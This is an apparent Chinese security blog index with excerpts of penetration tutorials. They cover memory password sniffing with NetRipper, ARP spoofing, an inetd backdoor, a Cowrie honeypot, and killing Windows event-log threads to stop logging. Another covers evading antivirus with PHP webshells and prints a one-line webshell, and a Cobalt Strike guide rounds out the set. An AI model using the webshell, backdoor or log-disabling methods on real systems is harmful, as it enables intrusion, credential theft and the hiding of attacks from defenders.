APT404-不作恶

在路上,一直在路上!

截获内存中的各类Https明文密码

0x01 利用 NetRipper 抓取内存中的https明文密码

    优点,可以在一个相对较低的系统权限下截获加密的明文,工具已经出了有些年头了,好在作者维护一直比较勤奋,才活到了现在,它支持截获像putty,winscp,mssql,chrome,firefox,outlook中的明文密码,同时也提供了很多类型的版本,如,win cmd下的exe,msf模块,ps脚本,实战中更推荐大家直接用powershell,更多详情请自行参考其github https://github.com/NytroRST/NetRipper

1
2
# powershell -exec bypass
PS> Import-Module .\Invoke-NetRipper.ps1

Read More >>>


Win & Linux 本地提权脑图



宝刀未老之 Ettercap 基础使用 [一]



0x01 关于ettercap

1
2
3
4
5
6
ettercap 确实已经非常老了,也确实是那个时代的经典,而且差不多三四年这个项目也都没再更新过了
对于一些防护并不是特别好的内网,依然非常实用,千万不要觉得工具老就没有它的应用场地,那样你就真的错了,如果真是这样,就不会有这么多的二次深度开发了
大家可能也发现了,像这类的工具我基本都是在模拟真实的生产机器环境上编译安装的
具体原因大家想必都很清楚,像这类基于二层的arp嗅探是没法直接在远程做的,毕竟不是直接处在目标的vpn内网中
socks代理再牛逼,它也只是个基于端口的四层代理,并不是vpn,所以,是没法直接在本地嗅远程的arp的,至于GRE隧道,咱们抽空再另说
话不多讲,直奔今天的主题,ettercap基础使用,注意,此次仅仅是基础使用

0x02 开启本地的路由转发

1
2
# echo 1 > /proc/sys/net/ipv4/ip_forward
# cat /proc/sys/net/ipv4/ip_forward

0x03 基础演示环境

1
2
3
CentOS release 6.9 (Final)  x86-64 ip: 192.168.3.4  接口名称: eth2  ettercap所在机器
win2008r2 ip: 192.168.3.23
win7cn ip: 192.168.3.8

Read More >>>


Arp攻防之arpoison



0x01 依然是先开启本地的路由转发

1
2
3
# vi /etc/sysctl.conf
net.ipv4.ip_forward=1
# sysctl -p

0x02 演示环境

1
2
3
4
centOS 6.8 x86_64	mac: 00:0C:29:C4:A0:95	ip : 192.168.3.4
win7cn mac: 00-0C-29-3B-BF-A8 ip : 192.168.3.8
win2008r2cn mac: 00-0C-29-6C-55-D2 ip : 192.168.3.23
网关 mac: dc-ee-06-96-b7-b7 ip : 192.168.3.1

0x03 下载编译 arpoison

1
2
3
4
5
6
7
8
# yum install epel-release -y
# yum install libnet libnet-devel -y
# wget http://www.arpoison.net/arpoison-0.7.tar.gz
# tar xf arpoison-0.7.tar.gz
# cd arpoison-0.7
# gcc arpoison.c /usr/lib64/libnet.so -o arpoison
# cp arpoison /usr/bin/
# arpoison -h

Read More >>>


熟练使用 Dsniff套件 进行嗅探



0x01 嗅探之前,我们有必要先来大致回顾下arp和rarp的基本通信流程,假设现在交换机中的mac地址表中暂时还没有任何对应关系A机器想和B机器进行通信

1
2
3
4
5
arp  地址解析协议,即通过ip找对应的mac:
首先,A会先发arp请求[广播],向同一交换机下的所有其它机器询问,谁有B的这个ip
当B收到这条消息时,就会再用arp响应给A,说,我有这个ip,我的mac是多少...
当完成第一次正常通信之后就会在交换机的mac地址表中记录下这层指向对应关系
后续就直接按照mac地址表中已有的指向来通信,而不再用广播询问,这就是一次极为常规的arp通信过程

1
2
3
4
rarp  反向地址解析协议,即通过mac找对应的ip:
理解完arp以后,我们再来看rarp,同样是先发请求,这个请求简单来讲也是一个广播,不过,在此广播中声明了自己的mac
并请求任何收到此请求的rarp服务器分配一个ip,当同网段的rarp服务器收到此请求后会检查自己的rarp列表找到该mac对应的ip
如果此mac的ip被找到,就直接响应对方使用,如果没找到,最后就会提示初始化失败

0x02 关于arp欺骗最核心的细节

1
2
3
4
5
假设同一交换机下有三台机器,分别为 A , B , C,正常情况下B和C的通信数据,A是不可能看到的
但在ARP缓存表机制中存在一个缺陷,就是当请求主机收到ARP应答包后,不会去验证自己曾经是否向对方主机发送过ARP请求
就直接就把这个应答包中的IP与MAC地址的对应关系更新到自己本地的ARP缓存表中,这时就直接导致原有IP的对应关系被恶意替换
通俗点儿理解,也就是说,我强制刷新了对方的arp缓存对应关系,把原来ip的指向现在换成了我自己的地址
导致现在B和C的通信都要先经过A,那么,我们在A上自然就可以顺利的看到C和B之间的所有明文通信数据,即实现了所谓的监听

Read More >>>


基于 Inetd 后门的简要分析及利用



0x01 理解inetd是干什么的

1
2
3
4
5
通俗来讲就是一个监听外部网络请求 [就是一个socket] 的系统守护进程,其实有很多比较古老的服务都是基于此守护进程的
具体怎么工作的呢,其实非常简单,当inetd接收到一个外部请求后,它会根据这个请求到自己的配置文件中去找到实际处理它的程序
然后再把接收到的这个socket交给那个程序去处理,问题恰巧也就出在这里
如果来自外部的某个socket是要执行一个可交互的shell [比如,我们已经在目标系统的inetd配置文件中事先定义好],这岂不是就相当于一个简易的bind型后门
另外,关于使用inet的好处就是,不用每个服务都再单独起个进程,这样可以有效降低系统资源消耗,你甚至也可以一定程度上把它理解成linux中的'svchost.exe'进程

Read More >>>


蜜罐学习之Ssh [ Cowrie ]



0x01 蜜罐是什么

1
2
蜜罐其实就是一台无人使用但却被严密监控的网络主机,里面包含着各类虚假的高价值资源和一些已知漏洞,以此吸引入侵者来入侵该主机
并且在被入侵的过程中,实时记录和审计入侵者的所有入侵攻击流量,行为和数据,以此了解入侵者的攻击方式,手段和目的,便于后期快速完成对其的溯源,取证工作

0x02 蜜罐的一些主要构成模块
按实现大概逻辑划分:

1
2
3
控制,将入侵者牢牢控制在指定的网络范围中,使其不能再以此机器作为跳板来攻击其它的机器
捕获,把入侵者在入侵过程中所产生的各种流量捕获住
分析,将捕获到的各种数据存到数据库或者其它指定地方,便于后续还原其详细的入侵攻击过程

按具体实现过程划分:

1
2
3
监控各种主机项,如,进程,文件,注册表,网络...
同时提交给入侵检测,以识别其更详细的入侵手段,并对整个入侵过程做详细记录
入侵数据汇总分析,其实就是把上述两步所得到的各种数据进行集中分析,最后,勾勒出完整的入侵轨迹画像

Read More >>>


Win入侵日志处理之powershell



0x01 前言:

1
2
3
4
很久之前,我们说过如何利用win自带的wevtutil工具来处理各种入侵日志
但那有个很致命的缺点,就是删除的时候是一下全给干掉了,这很显然不是我们想要的
今天我们就再来介绍另外一种相对[只是相对比较好,个人认为也并不是特别好,但值得在此基础上改进]比较好的处理方式
也正是我之前说的利用powershell来帮我们搞,具体实现如下

0x02 首先,我们有必要先来简单了解下windows的svchost进程是干什么的

1
2
简单通俗来讲,svchost主要是用来实现服务进程数据共享,以此来减少系统资源消耗的这么一个东西,下面挂靠的程序可能同时有很多个
说白点,其内部其实是作为线程[核心就在这儿]来运行的,关于更详细的简介,可直接参考维基百科上对其的说明

0x03 如果实在想自己手工实现该功能的话,大体思路如下:

1
2
3
找目标系统中Win事件日志服务的进程名,一般都是在svchost下
并从该进程中获取所对应的Win 事件日志服务线程ID
想办法杀掉这些id所对应的线程,以达到让目标系统日志服务无法正常工作的目的,这样系统就无法再搜集日志了

Read More >>>


全方位构造免杀 Webshell 小结[一]



前言:
    本文几乎涵盖了市面上所有已知的webshell免杀手段,自己也很清楚,有些东西一旦公布出去,基本就活不太久了,但好在技巧是死的,人是活的,基于前人的优秀经验基础上所衍生出来的更加刁钻诡异的思路才是最珍贵的,始终坚信,对抗是持续的,shell也是永远杀不完的…


0x01 首先就是基于各类最常规的命令和代码执行函数的花样变形如,拆分重组,动态执行,以此来躲避静态特征检测,不过像有些高危函数默认就会被运维们禁掉,甚至高版本的php默认已经不让执行系统命令[如,php7],万一再开了安全模式,就更费劲了

php中一些常见的执行类型函数:

1
2
3
4
5
6
7
system()
exec()
shell_exec()
passthru()
proc_open()
`` 反引号执行系统命令
...

1
<?php $_POST['fun']($_REQUEST['req']);?>

Read More >>>


Cobalt Strike 快速上手 [ 一 ]



0x01 关于 Cobalt Strike

1
2
3
一款非常优秀的后渗透平台 [ 谁用谁知道,嘿嘿……说不好用的唯一原因,可能就是很多用法还没有被自己挖掘出来,因为不会用,所以,才会感觉不好用 ]
工具基于java,大部分功能在改进的基础上还是相对比较实用的,非常适合团队间协同作战
更多详情请自行参考官网,这里就不啰嗦了,以下全部简称'cs'

0x02 基础环境简介:

1
2
3
4
5
kali 	  		实际控制端		ip:192.168.1.144
ubuntu 16.04 自己公网的vps ip:53.3.3.6
win2008R2 目标机器 ip:192.168.1.191
centos6.9 已控肉鸡 ip:192.168.1.199
win7cn 另一台肉鸡 ip:192.168.1.123

0x03 先来快速预览cs最基本的一些模块具体用途:

团队服务器[teamserver]

1
2
3
4
主要是为了方便一个渗透团队内部能够及时共享所有成员的所有渗透信息,加强成员间的交流协作,以此提高渗透效率
也就是说,正常情况下一个团队只需要起一个团队服务器即可,团队中的所有成员只需要拿着自己的cs客户端登录到团体服务器就能轻松实现协同作战
当然,实际中可能为了尽可能久的维持住目标机器权限,还会习惯性的多开几个团队服务器,防止出现意外情况
另外,团体服务器最好运行在linux平台上[本次演示所用的团队服务器系统为ubuntu 16.04]

Read More >>>